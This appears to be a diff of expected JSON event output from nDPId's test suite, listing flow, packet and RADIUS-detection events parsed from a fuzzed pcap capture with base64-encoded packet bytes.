00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997023501,"flow_last_seen":1528997023501,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528997023501,"l3_proto":"ip4","src_ip":"198.162.25.53","dst_ip":"10.12.64.30","src_port":1810,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997023501,"flow_last_seen":1528997023501,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528997023501,"l3_proto":"ip4","src_ip":"198.162.25.53","dst_ip":"10.12.64.30","src_port":1810,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1528997023501,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1528997023501,"pkt":"ABRP+4rqcNuYVcUnCABFAADA\/A1AAPwRV93Gohk1CgxAHgcSchAArGNDAysApImnbffn85ODhNvEVYWJb4QBNTAzMTE0ODAyODE1MDE1ODlAd2xhbi5HbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE0OWYvZTA6NWY6NLU6ODA6MDk6NWYvMjE2EiIzMuQ2NCBTdWJzY3JpYmVyIG5vdCBw8m92aXNpb25lZE8HBAEABwBQEhVAqRdhR287TKPkS7q+CkU="} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1528997023501,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1528997023501,"pkt":"ABRP+4rqcNuYVcUnCABFAADA\/A1AAPwRV93Gohk1CgxAHgcSchAArGNDAysApImnbffn85ODhNvEVYWJb4QBNTAzMTE0ODAyODE1MDE1ODlAd2xhbi5HbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE0OWYvZTA6NWY6NLU6ODA6MDk6NWYvMjE2EiIzMuQ2NCBTdWJzY3JpYmVyIG5vdCBw8m92aXNpb25lZE8HBAEABwBQEhVAqRdhR287TKPkS7q+CkU="}
01297{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":71,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":19456,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997030088,"pkt":"AAAMB6xAABRP+4rqTABFAALbIOpAAP8RAAC2DEAexuIZNXIQBxQCxwAAAS4Cv3+VaWYldnjLTxY8VfGmtUsaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMzNwZbIqStATUwMzExNDh\/MjgxNTAxNTg5QHdsYW4ubW5jNDgwLm0jYzMxMS4zZ3Bwbm10d29yay5vcmdZAxB+CDVjaXNjb4MGAAAAAR8TZTAtNWYtNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYmE5ZmE0MjI1YiwgNWIyMmE0OWYvZTA6NWY6NDU6OTA6MDk6NWYvMjE2BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODBtODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXPTTGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAKLIDwMxGgoAAFfIEAROShoRAABXyBELTHluamh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWWqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 01283{"packet_event_id":1,"packet_event_name":"packet","packet_id":71,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":19456,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997030088,"pkt":"AAAMB6xAABRP+4rqTABFAALbIOpAAP8RAAC2DEAexuIZNXIQBxQCxwAAAS4Cv3+VaWYldnjLTxY8VfGmtUsaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMzNwZbIqStATUwMzExNDh\/MjgxNTAxNTg5QHdsYW4ubW5jNDgwLm0jYzMxMS4zZ3Bwbm10d29yay5vcmdZAxB+CDVjaXNjb4MGAAAAAR8TZTAtNWYtNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYmE5ZmE0MjI1YiwgNWIyMmE0OWYvZTA6NWY6NDU6OTA6MDk6NWYvMjE2BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODBtODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXPTTGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAKLIDwMxGgoAAFfIEAROShoRAABXyBELTHluamh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWWqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00213{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":71,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":19456,"global_ts_msec":1528997037997} 00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":71,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":19456,"global_ts_msec":1528997037997}
00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997046661,"flow_last_seen":1528997046661,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997046661,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"74.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997046661,"flow_last_seen":1528997046661,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997046661,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"74.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1528997046661,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528997046661,"pkt":"ABRP+4rqcNuYVcUnCABFAACl\/GdAAPwRV57G4hk1SgxAHgcUchAAkRD9CzAAiXzLxBwubl1wwfS6AWnHLCcBNTAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE0OWYvZTA6NWY6NCU6OTA6MDk6NWYvMjE2Tw4BAAAMFwwAAAwBf\/xQEsknsuWEL1cn0K6nAa77dv0="} 00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1528997046661,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528997046661,"pkt":"ABRP+4rqcNuYVcUnCABFAACl\/GdAAPwRV57G4hk1SgxAHgcUchAAkRD9CzAAiXzLxBwubl1wwfS6AWnHLCcBNTAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE0OWYvZTA6NWY6NCU6OTA6MDk6NWYvMjE2Tw4BAAAMFwwAAAwBf\/xQEsknsuWEL1cn0K6nAa77dv0="}
00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997046661,"flow_last_seen":1528997046661,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997046661,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"74.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997046661,"flow_last_seen":1528997046661,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997046661,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"74.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
@@ -94,32 +94,32 @@
00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997050187,"flow_last_seen":1528997050187,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997050187,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997050187,"flow_last_seen":1528997050187,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997050187,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
00637{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1528997050255,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528997050255,"pkt":"ABRP+0\/qcNuYVcUnCABFAACl\/HNAAPwRV4nG4hk+CgxAHgcUchAIkVSXCzIAiQCjJQAe3VyUfsXAQgu9DVIBNTAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE0OWYvZTA6NWY6NDU6OTA6MDk6NWYvMjE2Tw4BAAAMFwwAAAwBf\/xQEnsk2TyvRrElAGPaQu1TGoc="} 00637{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1528997050255,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528997050255,"pkt":"ABRP+0\/qcNuYVcUnCABFAACl\/HNAAPwRV4nG4hk+CgxAHgcUchAIkVSXCzIAiQCjJQAe3VyUfsXAQgu9DVIBNTAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE0OWYvZTA6NWY6NDU6OTA6MDk6NWYvMjE2Tw4BAAAMFwwAAAwBf\/xQEnsk2TyvRrElAGPaQu1TGoc="}
01327{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1528997050383,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":697,"pkt_l4_len":663,"thread_ts_msec":1528997050383,"pkt":"AAAMD6xAABRP+4rqCABFAAKrtOpAAP8RAAAKDEAexuIZPnIQBxQClwAAATMCj3XAts8pgtMIwokQgS0z6XQaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AJQBbCQlXSVNQUjEwGgkAADghDQM1NwZbIqS6ATUwMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjR4MGAAAAAR8TZTAtNWYtNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJAStPdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYmE5ZmE0MjI1YiwgNWIyMmE0OWYvZTA6NWY6NDU6OTA6MDk6NWYvMjFiBAasFAEQSg5WWldDMlBlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAElBBgAAAAZRBDU2TwoCAAAIFwwAABoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIGRFWWlcgQzIgVGVzdCBMYWIaCyAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDKYAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMzAyODM5VxoMAAA4IRQGAAABAhpYAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVASp1PPp6fzyd7h983G\/yoSHA=="} 01327{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1528997050383,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":697,"pkt_l4_len":663,"thread_ts_msec":1528997050383,"pkt":"AAAMD6xAABRP+4rqCABFAAKrtOpAAP8RAAAKDEAexuIZPnIQBxQClwAAATMCj3XAts8pgtMIwokQgS0z6XQaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AJQBbCQlXSVNQUjEwGgkAADghDQM1NwZbIqS6ATUwMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjR4MGAAAAAR8TZTAtNWYtNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJAStPdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYmE5ZmE0MjI1YiwgNWIyMmE0OWYvZTA6NWY6NDU6OTA6MDk6NWYvMjFiBAasFAEQSg5WWldDMlBlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAElBBgAAAAZRBDU2TwoCAAAIFwwAABoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIGRFWWlcgQzIgVGVzdCBMYWIaCyAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDKYAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMzAyODM5VxoMAAA4IRQGAAABAhpYAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVASp1PPp6fzyd7h983G\/yoSHA=="}
00577{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":82,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":206,"pkt_l4_len":0,"thread_ts_msec":1528997050383,"pkt":"ABRP+4rqcNuYVcUnCABFAADA\/Hc3APwRV2rG4hk+CgxAHgcUchAArOXvAzMApAK5\/vK2WJ8qPE8W1U8CkZoBNTAzMTE0ODAyODE1MDE1ODlAd2xhbg5tbmM0ODAu2WNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE0OWYvZSUANWY6NDU6OTA6MDk6tWYXMjE2EiIzMjc2NGFTdWJzY3JpYmVyIG5vdCBwcm92aXdpb25lZE8HwQEABwBQEvaqqqqqqqqqqqqqqqqqqqo="} 00563{"packet_event_id":1,"packet_event_name":"packet","packet_id":82,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":206,"pkt_l4_len":0,"thread_ts_msec":1528997050383,"pkt":"ABRP+4rqcNuYVcUnCABFAADA\/Hc3APwRV2rG4hk+CgxAHgcUchAArOXvAzMApAK5\/vK2WJ8qPE8W1U8CkZoBNTAzMTE0ODAyODE1MDE1ODlAd2xhbg5tbmM0ODAu2WNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE0OWYvZSUANWY6NDU6OTA6MDk6tWYXMjE2EiIzMjc2NGFTdWJzY3JpYmVyIG5vdCBwcm92aXdpb25lZE8HwQEABwBQEvaqqqqqqqqqqqqqqqqqqqo="}
00231{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":82,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":172,"global_ts_msec":1528997050448} 00217{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":82,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":172,"global_ts_msec":1528997050448}
01295{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":83,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997050383,"pkt":"AAAMB6xAABRP+4rqCABFAALbIO5WAP8RAAAKDEAexuYZNXIQBxQCJQAAATQCv+aa7vRvKm2pJNxjASYcFmMaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMwNwZbIqTwATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwXVZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdGZzZTNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYmJmMGE0MjI1YiwgNTQyMmE0ZjAvZjA6Nzk6NjA6ZDFCN2Q6MzcvMjE4BAasFAEQIA5WWtdDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAHdBBgAAAAZRBDU2TzoCAQA4ATAzMRI0ODAwNzM2MzgQNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3ThbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgxrALTIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VyXmAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPUnRhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVASLJHJyWe9KDtsOLUZd3kW6Q=="} 01281{"packet_event_id":1,"packet_event_name":"packet","packet_id":83,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997050383,"pkt":"AAAMB6xAABRP+4rqCABFAALbIO5WAP8RAAAKDEAexuYZNXIQBxQCJQAAATQCv+aa7vRvKm2pJNxjASYcFmMaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMwNwZbIqTwATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwXVZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdGZzZTNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYmJmMGE0MjI1YiwgNTQyMmE0ZjAvZjA6Nzk6NjA6ZDFCN2Q6MzcvMjE4BAasFAEQIA5WWtdDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAHdBBgAAAAZRBDU2TzoCAQA4ATAzMRI0ODAwNzM2MzgQNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3ThbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgxrALTIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VyXmAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPUnRhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVASLJHJyWe9KDtsOLUZd3kW6Q=="}
00231{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":83,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":711,"global_ts_msec":1528997104586} 00217{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":83,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":711,"global_ts_msec":1528997104586}
00622{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":84,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":239,"pkt_l4_len":0,"thread_ts_msec":1528997050383,"pkt":"ABRP+4rqcNuYVcUnCABFAADh\/QZEAPwRVsPG4hk1CgxAHgcUchAAzQgPCzQAxXtSKpzAf8BNRiUAokr5DysBNTAzMTE0ODAwN542MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncEhuZXR3b3JrLm9yZyyJNWIyMmE0ZjAvZjA6Nzk6NjA6ZDE6N2Q6MzclADE4T0oBAgBIFwEAAAEFAACKcjsVwlSKKOJtGmnEM40WAgUAJQAILZ6MsQAAKZLBCeu2GRuLAQACCwUAAJ\/BcysACZ\/4FKr5Z9ZbwGpQEmbTcy3rfjC83itm2j6DCO4="} 00608{"packet_event_id":1,"packet_event_name":"packet","packet_id":84,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":239,"pkt_l4_len":0,"thread_ts_msec":1528997050383,"pkt":"ABRP+4rqcNuYVcUnCABFAADh\/QZEAPwRVsPG4hk1CgxAHgcUchAAzQgPCzQAxXtSKpzAf8BNRiUAokr5DysBNTAzMTE0ODAwN542MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncEhuZXR3b3JrLm9yZyyJNWIyMmE0ZjAvZjA6Nzk6NjA6ZDE6N2Q6MzclADE4T0oBAgBIFwEAAAEFAACKcjsVwlSKKOJtGmnEM40WAgUAJQAILZ6MsQAAKZLBCeu2GRuLAQACCwUAAJ\/BcysACZ\/4FKr5Z9ZbwGpQEmbTcy3rfjC83itm2j6DCO4="}
